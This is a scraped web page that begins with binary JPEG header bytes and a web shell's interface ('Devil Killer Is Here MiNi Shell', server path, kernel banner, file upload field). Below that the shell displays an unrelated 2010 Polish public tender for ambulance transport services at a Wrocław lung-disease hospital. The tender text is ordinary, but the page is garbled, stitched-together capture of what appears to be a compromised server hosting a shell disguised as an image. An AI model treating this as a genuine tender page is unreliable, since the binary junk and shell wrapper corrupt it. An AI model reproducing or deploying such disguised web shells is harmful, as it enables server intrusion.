JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100721/195197-N-2010.html

<p class="kh_header"><b>Wrocław: świadczenie przez Wykonawcę na rzecz Dolnośląskiego Centrum Chorób Płuc we Wrocławiu przy ul. Grabiszyńskiej 105 oraz placówki  zamiejscowej  w Obornikach Śl. usług transportowych specjalistycznymi środkami transportu sanitarnego w terminie 12 miesięcy od podpisania umowy</b><br>
<b>Numer ogłoszenia: 195197 - 2010; data zamieszczenia: 21.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Chorób Płuc we Wrocławiu , ul. Grabiszyńska 105, 53-439 Wrocław, woj. dolnośląskie, tel. 071 3349520, 410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dcchp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie przez Wykonawcę na rzecz Dolnośląskiego Centrum Chorób Płuc we Wrocławiu przy ul. Grabiszyńskiej 105 oraz placówki  zamiejscowej  w Obornikach Śl. usług transportowych specjalistycznymi środkami transportu sanitarnego w terminie 12 miesięcy od podpisania umowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest -  świadczenie przez Wykonawcę na rzecz Dolnośląskiego Centrum Chorób Płuc we Wrocławiu przy ul. Grabiszyńskiej 105 oraz placówki  zamiejscowej  w Obornikach Śl. usług transportowych specjalistycznymi środkami transportu sanitarnego w terminie 12 miesięcy od podpisania umowy, tj:
I. WROCŁAW UL. GRABISZYŃSKA 105:	
Zadanie 1.   transport zespołem transportowym, zwanym dalej zespołem T
a) 	Przewóz pacjentów w pozycji leżącej  i siedzącej,  przewóz krwi,  środków krwiopochodnych i materiałów biologicznych, wraz  z pomocą kierowcy przy pracach za i wyładunkowych,  realizowany przez karetkę T z kierowcą  (sanitariusza zapewnia Zamawiający. Jeżeli jednak Zamawiający zamówi u Wykonawcy sanitariusza dzień wcześniej - wykonawca ma obowiązek sanitariusza zapewnić) podstawioną przez Wykonawcę w dni robocze od poniedziałku do piątku w godz. 8.00-19.00 w placówce Zamawiającego we Wrocławiu, przy ul. Grabiszyńskiej  105.
b) Przewóz pacjentów w pozycji leżącej  i siedzącej wraz  z pomocą kierowcy 
i sanitariusza przy pracach za i wyładunkowych,  realizowany na wezwanie przez karetkę T z kierowcą i sanitariuszem, z placówki Zamawiającego we Wrocławiu przy ul. Grabiszyńskiej 105, w dni  robocze od 19.00  - 8.00,  a także w dni ustawowo wolne. W wyjątkowych sytuacjach - Przewóz krwi,  środków krwiopochodnych i materiałów biologicznych realizowany na wezwanie przez  karetkę T z kierowcą, z placówki Zamawiającego we Wrocławiu przy ul. Grabiszyńskiej 105, w dni robocze od  19.00-  do 8.00,  a także w dni  ustawowo wolne od pracy.  
c) W szczególnych przypadkach, w celu, zakresie i na warunkach określonych w zadaniu 1 lit b), Wykonawca jest zobowiązany do udostępnienia w godzinach 8:00 - 19:00 dodatkowej karetki T na wezwanie.

Zadanie 2.  - transport zespołem podstawowym zwanym dalej zespołem P
Przewóz pacjentów w pozycji leżącej  i siedzącej realizowany na  wezwanie  przez karetkę P, z co najmniej dwoma osobami uprawnionymi do wykonywania medycznych czynności ratunkowych (o kwalifikacji: pielęgniarka systemu lub ratownik medyczny - ewentualnie lekarz ) z placówki Zamawiającego we Wrocławiu przy  ul. Grabiszyńskiej 105, we wszystkie dni tygodnia o każdej porze. 
Zamawiający zastrzega sobie prawo do wyboru pomiędzy następującymi środkami transportu:
a)	Karetką P - z zespołem paramedycznym (z co najmniej dwoma osobami uprawnionymi do wykonywania medycznych czynności ratunkowych (o kwalifikacji: pielęgniarka systemu lub ratownik medyczny)
b)	Karetka P z lekarzem (z co najmniej dwoma osobami uprawnionymi do wykonywania medycznych czynności ratunkowych, z czego co najmniej  jedna osoba o kwalifikacji: pielęgniarka systemu lub ratownik medyczny, a także - lekarz)

Zadanie 3. - transport zespołem specjalistycznym, zwanym dalej zespołem S

Przewóz pacjentów w pozycji leżącej i siedzącej realizowany  na wezwanie przez karetkę S  z co najmniej 3 osobami uprawnionymi do wykonywania medycznych czynności ratunkowych, w tym lekarz systemu oraz pielęgniarka systemu lub ratownik medyczny)
z placówki Zamawiającego we Wrocławiu przy  ul. Grabiszyńskiej  105, we wszystkie dni  tygodnia, o każdej porze. 


II. PLACÓWKA ZAMIEJSCOWA W OBORNIKACH ŚLĄSKICH:

Zadanie 4. - transport zespołem T
a) Przewóz pacjentów w pozycji leżącej  i siedzącej, przewóz krwi, środków krwiopochodnych i materiałów biologicznych, wraz  z pomocą kierowcy  przy pracach za i wyładunkowych, realizowany przez karetkę T wraz  z kierowcą (sanitariusza zapewnia Zamawiający. Jeżeli jednak Zamawiający zamówi u Wykonawcy sanitariusza dzień wcześniej - wykonawca ma obowiązek sanitariusza zapewnić), podstawioną przez Wykonawcę w dni robocze od  poniedziałku do  piątku w godz.  7:30-14.30 w placówce Zamawiającego w Obornikach  Śląskich, przy ul. Dunikowskiego 2-8.
b) Przewóz pacjentów w pozycji leżącej  i siedzącej wraz  z pomocą kierowcy i sanitariusza przy  pracach za i wyładunkowych  realizowany na  wezwanie przez karetkę T z kierowcą i sanitariuszem, z placówki Zamawiającego w Obornikach Śląskich, przy ul. Dunikowskiego 2-8, w dni robocze od 14:30 do 7:30, a także  w dni ustawowo wolne. W wyjątkowych sytuacjach - Przewóz krwi,  środków krwiopochodnych i materiałów biologicznych, realizowany na  wezwanie przez karetkę T z kierowcą, z placówki Zamawiającego  w Obornikach Śląskich, w dni robocze od 14.30  do 7:30 a także w dni  ustawowo wolne. 
c) W szczególnych przypadkach, w celu, zakresie i na warunkach określonych w zadaniu 4 lit b), Wykonawca jest zobowiązany do udostępnienia w godzinach 7:30 - 14:30 dodatkowej karetki T na wezwanie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże odpowiednie dokumenty rejestracyjne, na podstawie których może świadczyć usługi transportu medycznego, tj. Kserokopia wpisu do rejestru Zakładów Opieki Zdrowotnej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Wykonawca obowiązany jest wykazać wykonanie, (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych) usług  w zakresie niezbędnym do wykazania  spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  usług, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie - (zał.3 do siwz). Zamawiający uzna warunek za spełniony, jeżeli  wykonawca wykaże minimum jedną usługę  odpowiadającą rodzajem lub podobnym rodzajem  usługom  stanowiącym przedmiot niniejszego zamówienia  na kwotę  co najmniej  równą wartości oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o posiadaniu wystarczającej ilości karetek na realizację przedmiotu zamówienia tak, aby każde zadanie na które Wykonawca startuje miało zabezpieczenie 
w postaci minimum 2 karetek które mogą być stosowane zamiennie, wraz z kserokopiami  ich dowodów rejestracyjnych, mogącymi obsłużyć gminy okoliczne w promieniu do 50 km od granic Wrocławia. UWAGA: Wykonawca oprócz powyższego oświadczenia przedstawia wykaz karetek jakie przeznacza do obsługi danego zadania, wraz z podaniem ich daty produkcji. Karetki nie mogą być starsze niż 8 lat! (zał. Nr 7 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może dysponować tymi osobami zatrudnionymi zarówno na podstawie umowy o pracę, jak i na innej podstawie np. umowie zlecenia, umowie o dzieło, czy umowie przedwstępnej. 
a)	Obowiązuje wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w jego wykonaniu, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (zał. nr 4  do SIWZ)
b)	W zakresie zadania 2 i 3, Wykonawca zobowiązany jest złożyć oświadczenie o zatrudnianiu minimum 2 lekarzy (zał. Nr. 6 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku należy wykazać posiadanie polisy OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę równą co najmniej wartości oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oryginał pełnomocnictwa (jeśli jest wymagane). Uwaga! Wymagana jest forma pisemna i rodzaj pełnomocnictwa właściwy do poszczególnych czynności, a przede wszystkim do  reprezentowania w przedmiotowym postępowaniu (w tym do podpisania oferty) albo do reprezentowania w przedmiotowym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Przewiduje się możliwość zmiany postanowień umowy:
-  ze względu na przyczyny wynikające ze statutowej działalności szpitala.
- w zakresie zmiany marki samochodu (ambulansu) na samochód o podobnych parametrach użytkowych, spełniający określone wymogi - zwłaszcza w przypadku pojazdu S, jeśli zmiana taka jest konieczna. 
-  zmiana treści umowy ze względu na zmianę powszechnie obowiązujących przepisów, zwłaszcza ustawy o Ratownictwie Medycznym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dcchp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych(BZP)
Godziny pracy BZP: od poniedziałku do piątku w godz. od 730 do 1505 
53-439 Wrocław ul. Grabiszyńska 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2010 godzina 11:30, miejsce: Ofertę należy złożyć w Sekretariacie siedziby Zamawiającego pokój nr 4 (wysoki pater)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> transport zespołem transportowym, zwanym dalej zespołem T
a) 	Przewóz pacjentów w pozycji leżącej  i siedzącej,  przewóz krwi,  środków krwiopochodnych i materiałów biologicznych, wraz  z pomocą kierowcy przy pracach za i wyładunkowych,  realizowany przez karetkę T z kierowcą  (sanitariusza zapewnia Zamawiający. Jeżeli jednak Zamawiający zamówi u Wykonawcy sanitariusza dzień wcześniej - wykonawca ma obowiązek sanitariusza zapewnić) podstawioną przez Wykonawcę w dni robocze od poniedziałku do piątku w godz. 8.00-19.00 w placówce Zamawiającego we Wrocławiu, przy ul. Grabiszyńskiej  105.
b) Przewóz pacjentów w pozycji leżącej  i siedzącej wraz  z pomocą kierowcy 
i sanitariusza przy pracach za i wyładunkowych,  realizowany na wezwanie przez karetkę T z kierowcą i sanitariuszem, z placówki Zamawiającego we Wrocławiu przy ul. Grabiszyńskiej 105, w dni  robocze od 19.00  - 8.00,  a także w dni ustawowo wolne. W wyjątkowych sytuacjach - Przewóz krwi,  środków krwiopochodnych i materiałów biologicznych realizowany na wezwanie przez  karetkę T z kierowcą, z placówki Zamawiającego we Wrocławiu przy ul. Grabiszyńskiej 105, w dni robocze od  19.00-  do 8.00,  a także w dni  ustawowo wolne od pracy.  
c) W szczególnych przypadkach, w celu, zakresie i na warunkach określonych w zadaniu 1 lit b), Wykonawca jest zobowiązany do udostępnienia w godzinach 8:00 - 19:00 dodatkowej karetki T na wezwanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> transport zespołem podstawowym zwanym dalej zespołem P
Przewóz pacjentów w pozycji leżącej  i siedzącej realizowany na  wezwanie  przez karetkę P, z co najmniej dwoma osobami uprawnionymi do wykonywania medycznych czynności ratunkowych (o kwalifikacji: pielęgniarka systemu lub ratownik medyczny - ewentualnie lekarz ) z placówki Zamawiającego we Wrocławiu przy  ul. Grabiszyńskiej 105, we wszystkie dni tygodnia o każdej porze. 
Zamawiający zastrzega sobie prawo do wyboru pomiędzy następującymi środkami transportu:
a)	Karetką P - z zespołem paramedycznym (z co najmniej dwoma osobami uprawnionymi do wykonywania medycznych czynności ratunkowych (o kwalifikacji: pielęgniarka systemu lub ratownik medyczny)
b)	Karetka P z lekarzem (z co najmniej dwoma osobami uprawnionymi do wykonywania medycznych czynności ratunkowych, z czego co najmniej  jedna osoba o kwalifikacji: pielęgniarka systemu lub ratownik medyczny, a także - lekarz).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.</p>
